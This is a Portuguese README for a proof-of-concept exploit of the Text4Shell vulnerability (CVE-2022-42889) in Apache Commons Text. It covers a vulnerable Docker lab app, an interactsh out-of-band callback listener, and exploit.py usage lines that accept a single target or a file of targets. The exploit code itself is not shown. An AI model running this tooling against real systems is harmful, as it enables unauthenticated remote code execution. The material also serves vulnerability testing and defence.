
CVE-2022-42889 - Exploit Text4Shell
Este é uma Prova de Conceito explorando a vulnerabilidade no Apache Commons Text [CVE-2022-42889]
Versões vulneráveis : 1.5.0 a (não incluindo) 1.10.0
A exploração bem-sucedida desta vulnerabilidade permite que um atacante não autenticado execute código arbitrário no ativo vulnerável
Aplicação desenvolvida por @securekomodo, está anexada aqui.
Esta aplicação também pode ser carregada a partir do docker-registry
docker run -p 8080:8080 gokul2/text4shell-poc:latest
A aplicação estará disponível em localhost:8080 agora.
Para verificar a Execução Arbitrária de Comandos, usamos interactsh, uma ferramenta para capturar interações OOB por @projectdiscovery.
Configure o cliente interactsh antes de executar o exploit propriamente dito.
docker run projectdiscovery/interactsh-client:latest
Anote o domínio listado após iniciar a aplicação
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
Verifique os logs no interactsh-client para validar o exploit.